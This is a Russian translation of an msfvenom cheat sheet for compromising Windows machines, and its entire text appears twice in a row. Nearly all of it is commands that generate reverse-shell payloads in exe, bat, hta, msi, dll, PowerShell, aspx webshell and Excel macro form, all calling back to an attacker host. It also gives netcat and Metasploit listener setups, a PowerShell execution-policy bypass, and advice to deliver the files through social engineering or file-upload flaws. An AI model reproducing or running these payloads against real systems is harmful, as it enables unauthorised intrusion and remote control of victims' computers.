В этом посте вы узнаете, как использовать MsfVenom для создания всех типов Пейлодов для эксплуатации платформы Windows. Прочтите руководство для начинающих отсюда (https://www.hackingarticles.in/msfvenom-tutorials-beginners/)
Требования:
- Кали Linux
- Windows машина
Синтаксис MsfVenom
MsfVenom - это автономный генератор полезной нагрузки Metasploit, который также является заменой msfpayload и msfencode.
Пейлоды и их типы
Полезная нагрузка - это вредоносные сценарии, которые злоумышленник использует для взаимодействия с целевой машиной с целью ее компрометации. Msfvenom поддерживает следующую платформу и формат для создания полезной нагрузки. Формат вывода может быть в виде исполняемых файлов, таких как exe, php, dll, или в виде однострочного файла.
Два основных типа полезной нагрузки
- Стейджер: они обычно обозначаются вторым слешем (/), например windows/meterpreter/reverse_tcp.
- СтейджерЛесс: используют нижнее подчеркивание (_) вместо второго (/) в имени полезной нагрузки, например windows/meterpreter_reverse_tcp
Как мы уже упоминали выше, этот пост может помочь вам изучить все возможные методы создания различных форматов полезной нагрузки для эксплуатации платформы Windows.
Исполняемая полезная нагрузка (exe)
Тип полезной нагрузки: Stager
Выполнение следующей команды для создания вредоносного exe-файла - это распространенное расширение имени файла, обозначающее исполняемый файл для Microsoft Windows.
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f exe > shell.exe
Весь вредоносный код будет записан внутри файла shell.exe и будет выполняться на целевой машине как исполняемая программа.
Поделитесь этим файлом с помощью тактики социальной инженерии и дождитесь выполнения файда. Тем временем запустите netcat в качестве прослушивателя для перехвата реверс соединения.
nc –lvp 443
Пакетный файл Powershell
Тип полезной нагрузки: Stager
Выполните следующую команду, чтобы создать вредоносный пакетный файл, расширение имени файла .bat используется в DOS и Windows.
msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.3 lport=443 > shell.bat
Весь вредоносный код будет записан внутри файла shell.bat и будет выполняться как сценарий .bat на целевой машине.
Поделитесь этим файлом с помощью тактики социальной инженерии и дождитесь выполнения на цели. Тем временем запустите netcat в качестве прослушивателя для перехвата реверс соединения.
nc –lvp 443
Пейлод HTML (HTA)
Тип полезной нагрузки: Stager
Приложение HTML (HTA) - это программа Microsoft Windows, исходный код которой состоит из HTML, динамического HTML и одного или нескольких языков сценариев, поддерживаемых Internet Explorer, например VBScript или JScript.
Выполните следующую команду, чтобы создать вредоносный файл HTA, расширение файла .hta используется в DOS и Windows.
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f hta-psh > shell.hta
Весь вредоносный код будет записан внутри файла shell.hta и будет выполняться как сценарий .hta на целевой машине. Используйте HTTP-сервер Python для обмена файлами.
mshta http://192.168.1.3/shell.hta
HTA выполняется с помощью программы mshta.exe или двойным щелчком по файлу.
Это приведет к реверс соединению через прослушиватель netcat, который работает в фоновом режиме для перехвата реверс соединения.
nc –lvp 443
Пейлод установщика Microsoft (MSI)
Установщик Windows также известен как установщик Microsoft. Файл MSI - это пакет Windows, который предоставляет информацию об установке для определенного установщика, например программы, которые необходимо установить. Его можно использовать для установки обновлений Windows или стороннего программного обеспечения, такого же как exe.
Выполните следующую команду, чтобы создать вредоносный файл MSI, расширение имени файла .msi используется в DOS и Windows. Перенести вредоносную программу в целевую систему и запустить ее.
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f msi > shell.msi
Используйте команду msiexec для запуска файла MSI.
msiexec /quiet /qn /i shell.msi
Это приведет к реверс соединению через прослушиватель netcat, который работает в фоновом режиме для перехвата реверс соединения.
Полезная нагрузка библиотеки динамической компоновки (DLL)
Тип полезной нагрузки: Stager
DLL - это библиотека, содержащая код и данные, которые могут использоваться более чем одной программой.
Выполните следующую команду, чтобы создать вредоносный файл DLL, расширение файла .dll используется в DOS и Windows. Перенести вредоносную программу в целевую систему и запустить ее.
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f dll > shell.dll
Используйте команду rundll32 для запуска файла MSI.
rundll32.exe shell.dll,0
Это приведет к реверс соединению через прослушиватель netcat, который работает в фоновом режиме для перехвата реверс соединения.
Пейлоад Powershell (psh-cmd)
Тип полезной нагрузки: Stager
Формат - psh, psh-net, psh-reflection или psh-cmd.
Сгенерированная полезная нагрузка для форматов psh, psh-net и psh-reflection имеет расширение .ps1, а сгенерированная полезная нагрузка для формата psh-cmd имеет расширение .cmd. В противном случае вы можете напрямую выполнить необработанный код внутри командной строки целевая система.
msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.3 lport=443 -f psh-cmd > -f raw
Выполните следующую команду, чтобы сгенерировать сырой код для вредоносной программы PowerShell.
Для выполнения скопируйте сгенерированный код и вставьте его в командную строку Windows.
Это приведет к реверс соединению через прослушиватель netcat, который работает в фоновом режиме для перехвата реверс соединения.
Полезная нагрузка Powershell (ps1)
Тип полезной нагрузки: Stager
Файл PS1 - это сценарий или "командлет", используемый Windows PowerShell. Файлы PS1 похожи на файлы .BAT и .CMD, за исключением того, что они выполняются в Windows PowerShell вместо командной строки Windows.
Выполните следующую команду, чтобы создать вредоносный сценарий PS1 с расширением имени файла. PS1 используется в Windows PowerShell.
msfvenom -p windows/x64/meterpreter_reverse_https lhost=192.168.1.3 lport=443 -f psh > shell.ps1
Поскольку реверс тип оболочки - meterpreter, нам нужно запустить exploit/multi/handler внутри фреймворка Metasploit.
Политика выполнения PowerShell - это функция безопасности, которая контролирует условия, при которых PowerShell загружает файлы конфигурации и запускает сценарии. Эта функция помогает предотвратить выполнение вредоносных скриптов. Запрещает запуск всех файлов сценариев, включая файлы форматирования и конфигурации (.ps1xml), файлы сценариев модулей (.psm1) и профили PowerShell (.ps1).
Подробнее читайте здесь (https://docs.microsoft.com/en-us/po.../about_execution_policies?view=powershell-7.2)
Чтобы выполнить сценарий PS1, вам необходимо обойти политику выполнения, выполнив следующую команду в Windows PowerShell и выполнив сценарий.
PowerShell –ep bypass
.\shell.ps1
msfconsole
use exploit/multi/handler
set lhost 192.168.1.3
set lport 443
set payload windows/x64/meterpreter_reverse_https
Как только цель выполнит сценарий shell.ps1, злоумышленник получит реверс соединение через сеанс метерпредставителя.
Полезная нагрузка веб-оболочки (ASPX)
Тип полезной нагрузки: стейджлесс
Файл ASPX - это файл Active Server Page Extended для платформы Microsoft ASP.NET. При просмотре URL-адреса эти страницы отображаются в веб-браузере пользователя. Другое название для них - веб-формы .NET.
Выполните следующую команду, чтобы создать вредоносный сценарий aspx с расширением файла .aspx.
msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.1.3 lport=443 -f aspx > shell.aspx
Поскольку реверс тип оболочки - meterpreter, нам нужно запустить exploit/multi/handler внутри фреймворка metasploit.
Вы можете внедрить эту полезную нагрузку для использования уязвимости неограниченной загрузки файлов, если целью является веб-сервер IIS. (https://www.hackingarticles.in/comprehensive-guide-on-unrestricted-file-upload/)
Выполните сценарий загрузки в веб-браузере.
msfconsole
use exploit/multi/handler
set lhost 192.168.1.3
set lport 443
set payload windows/x64/meterpreter_reverse_https
Как только злоумышленник выполнит вредоносный скрипт, он получит реверс соединение через сессию метерпретера.
Пейлоад Visual Basic (.vba)
Тип полезной нагрузки: стейджлесс
VBA - это расширение файла, обычно связанное с Visual Basic, которое поддерживает такие приложения Microsoft, как Microsoft Excel, Office, PowerPoint, Word и Publisher. Он используется для создания "макросов" которые работают в Excel. Злоумышленник пользуется привилегиями этих функций и создает вредоносный сценарий VB, который будет выполняться как программа макросов с Microsoft Excel.
Выполните следующую команду, чтобы создать вредоносный сценарий aspx с расширением имени файла .aspx, который будет выполняться как макрос в Microsoft Excel.
Подробнее читайте здесь: (https://www.hackingarticles.in/multiple-ways-to-exploit-windows-systems-using-macros/)
msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.1.3 lport=443 -f vba
Теперь мы открываем наш Воркбук, в которую внедрены вредоносные макросы. Комплексный метод выполнения макросов объяснен в нашем предыдущем посте.
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost 192.168.1.106
set lport 1234
exploit
Как только злоумышленник выполнит вредоносный скрипт, он получит реверс соединение через сессию метерпретера.
Переведено специально для xss.pro
Автор перевода: yashechka
Источник: https://www.hackingarticles.in/msfvenom-cheatsheet-windows-exploitation/
Требования:
- Кали Linux
- Windows машина
Синтаксис MsfVenom
MsfVenom - это автономный генератор полезной нагрузки Metasploit, который также является заменой msfpayload и msfencode.
Пейлоды и их типы
Полезная нагрузка - это вредоносные сценарии, которые злоумышленник использует для взаимодействия с целевой машиной с целью ее компрометации. Msfvenom поддерживает следующую платформу и формат для создания полезной нагрузки. Формат вывода может быть в виде исполняемых файлов, таких как exe, php, dll, или в виде однострочного файла.
Два основных типа полезной нагрузки
- Стейджер: они обычно обозначаются вторым слешем (/), например windows/meterpreter/reverse_tcp.
- СтейджерЛесс: используют нижнее подчеркивание (_) вместо второго (/) в имени полезной нагрузки, например windows/meterpreter_reverse_tcp
Как мы уже упоминали выше, этот пост может помочь вам изучить все возможные методы создания различных форматов полезной нагрузки для эксплуатации платформы Windows.
Исполняемая полезная нагрузка (exe)
Тип полезной нагрузки: Stager
Выполнение следующей команды для создания вредоносного exe-файла - это распространенное расширение имени файла, обозначающее исполняемый файл для Microsoft Windows.
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f exe > shell.exe
Весь вредоносный код будет записан внутри файла shell.exe и будет выполняться на целевой машине как исполняемая программа.
Поделитесь этим файлом с помощью тактики социальной инженерии и дождитесь выполнения файда. Тем временем запустите netcat в качестве прослушивателя для перехвата реверс соединения.
nc –lvp 443
Пакетный файл Powershell
Тип полезной нагрузки: Stager
Выполните следующую команду, чтобы создать вредоносный пакетный файл, расширение имени файла .bat используется в DOS и Windows.
msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.3 lport=443 > shell.bat
Весь вредоносный код будет записан внутри файла shell.bat и будет выполняться как сценарий .bat на целевой машине.
Поделитесь этим файлом с помощью тактики социальной инженерии и дождитесь выполнения на цели. Тем временем запустите netcat в качестве прослушивателя для перехвата реверс соединения.
nc –lvp 443
Пейлод HTML (HTA)
Тип полезной нагрузки: Stager
Приложение HTML (HTA) - это программа Microsoft Windows, исходный код которой состоит из HTML, динамического HTML и одного или нескольких языков сценариев, поддерживаемых Internet Explorer, например VBScript или JScript.
Выполните следующую команду, чтобы создать вредоносный файл HTA, расширение файла .hta используется в DOS и Windows.
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f hta-psh > shell.hta
Весь вредоносный код будет записан внутри файла shell.hta и будет выполняться как сценарий .hta на целевой машине. Используйте HTTP-сервер Python для обмена файлами.
mshta http://192.168.1.3/shell.hta
HTA выполняется с помощью программы mshta.exe или двойным щелчком по файлу.
Это приведет к реверс соединению через прослушиватель netcat, который работает в фоновом режиме для перехвата реверс соединения.
nc –lvp 443
Пейлод установщика Microsoft (MSI)
Установщик Windows также известен как установщик Microsoft. Файл MSI - это пакет Windows, который предоставляет информацию об установке для определенного установщика, например программы, которые необходимо установить. Его можно использовать для установки обновлений Windows или стороннего программного обеспечения, такого же как exe.
Выполните следующую команду, чтобы создать вредоносный файл MSI, расширение имени файла .msi используется в DOS и Windows. Перенести вредоносную программу в целевую систему и запустить ее.
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f msi > shell.msi
Используйте команду msiexec для запуска файла MSI.
msiexec /quiet /qn /i shell.msi
Это приведет к реверс соединению через прослушиватель netcat, который работает в фоновом режиме для перехвата реверс соединения.
Полезная нагрузка библиотеки динамической компоновки (DLL)
Тип полезной нагрузки: Stager
DLL - это библиотека, содержащая код и данные, которые могут использоваться более чем одной программой.
Выполните следующую команду, чтобы создать вредоносный файл DLL, расширение файла .dll используется в DOS и Windows. Перенести вредоносную программу в целевую систему и запустить ее.
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f dll > shell.dll
Используйте команду rundll32 для запуска файла MSI.
rundll32.exe shell.dll,0
Это приведет к реверс соединению через прослушиватель netcat, который работает в фоновом режиме для перехвата реверс соединения.
Пейлоад Powershell (psh-cmd)
Тип полезной нагрузки: Stager
Формат - psh, psh-net, psh-reflection или psh-cmd.
Сгенерированная полезная нагрузка для форматов psh, psh-net и psh-reflection имеет расширение .ps1, а сгенерированная полезная нагрузка для формата psh-cmd имеет расширение .cmd. В противном случае вы можете напрямую выполнить необработанный код внутри командной строки целевая система.
msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.3 lport=443 -f psh-cmd > -f raw
Выполните следующую команду, чтобы сгенерировать сырой код для вредоносной программы PowerShell.
Для выполнения скопируйте сгенерированный код и вставьте его в командную строку Windows.
Это приведет к реверс соединению через прослушиватель netcat, который работает в фоновом режиме для перехвата реверс соединения.
Полезная нагрузка Powershell (ps1)
Тип полезной нагрузки: Stager
Файл PS1 - это сценарий или "командлет", используемый Windows PowerShell. Файлы PS1 похожи на файлы .BAT и .CMD, за исключением того, что они выполняются в Windows PowerShell вместо командной строки Windows.
Выполните следующую команду, чтобы создать вредоносный сценарий PS1 с расширением имени файла. PS1 используется в Windows PowerShell.
msfvenom -p windows/x64/meterpreter_reverse_https lhost=192.168.1.3 lport=443 -f psh > shell.ps1
Поскольку реверс тип оболочки - meterpreter, нам нужно запустить exploit/multi/handler внутри фреймворка Metasploit.
Политика выполнения PowerShell - это функция безопасности, которая контролирует условия, при которых PowerShell загружает файлы конфигурации и запускает сценарии. Эта функция помогает предотвратить выполнение вредоносных скриптов. Запрещает запуск всех файлов сценариев, включая файлы форматирования и конфигурации (.ps1xml), файлы сценариев модулей (.psm1) и профили PowerShell (.ps1).
Подробнее читайте здесь (https://docs.microsoft.com/en-us/po.../about_execution_policies?view=powershell-7.2)
Чтобы выполнить сценарий PS1, вам необходимо обойти политику выполнения, выполнив следующую команду в Windows PowerShell и выполнив сценарий.
PowerShell –ep bypass
.\shell.ps1
msfconsole
use exploit/multi/handler
set lhost 192.168.1.3
set lport 443
set payload windows/x64/meterpreter_reverse_https
Как только цель выполнит сценарий shell.ps1, злоумышленник получит реверс соединение через сеанс метерпредставителя.
Полезная нагрузка веб-оболочки (ASPX)
Тип полезной нагрузки: стейджлесс
Файл ASPX - это файл Active Server Page Extended для платформы Microsoft ASP.NET. При просмотре URL-адреса эти страницы отображаются в веб-браузере пользователя. Другое название для них - веб-формы .NET.
Выполните следующую команду, чтобы создать вредоносный сценарий aspx с расширением файла .aspx.
msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.1.3 lport=443 -f aspx > shell.aspx
Поскольку реверс тип оболочки - meterpreter, нам нужно запустить exploit/multi/handler внутри фреймворка metasploit.
Вы можете внедрить эту полезную нагрузку для использования уязвимости неограниченной загрузки файлов, если целью является веб-сервер IIS. (https://www.hackingarticles.in/comprehensive-guide-on-unrestricted-file-upload/)
Выполните сценарий загрузки в веб-браузере.
msfconsole
use exploit/multi/handler
set lhost 192.168.1.3
set lport 443
set payload windows/x64/meterpreter_reverse_https
Как только злоумышленник выполнит вредоносный скрипт, он получит реверс соединение через сессию метерпретера.
Пейлоад Visual Basic (.vba)
Тип полезной нагрузки: стейджлесс
VBA - это расширение файла, обычно связанное с Visual Basic, которое поддерживает такие приложения Microsoft, как Microsoft Excel, Office, PowerPoint, Word и Publisher. Он используется для создания "макросов" которые работают в Excel. Злоумышленник пользуется привилегиями этих функций и создает вредоносный сценарий VB, который будет выполняться как программа макросов с Microsoft Excel.
Выполните следующую команду, чтобы создать вредоносный сценарий aspx с расширением имени файла .aspx, который будет выполняться как макрос в Microsoft Excel.
Подробнее читайте здесь: (https://www.hackingarticles.in/multiple-ways-to-exploit-windows-systems-using-macros/)
msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.1.3 lport=443 -f vba
Теперь мы открываем наш Воркбук, в которую внедрены вредоносные макросы. Комплексный метод выполнения макросов объяснен в нашем предыдущем посте.
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost 192.168.1.106
set lport 1234
exploit
Как только злоумышленник выполнит вредоносный скрипт, он получит реверс соединение через сессию метерпретера.
Переведено специально для xss.pro
Автор перевода: yashechka
Источник: https://www.hackingarticles.in/msfvenom-cheatsheet-windows-exploitation/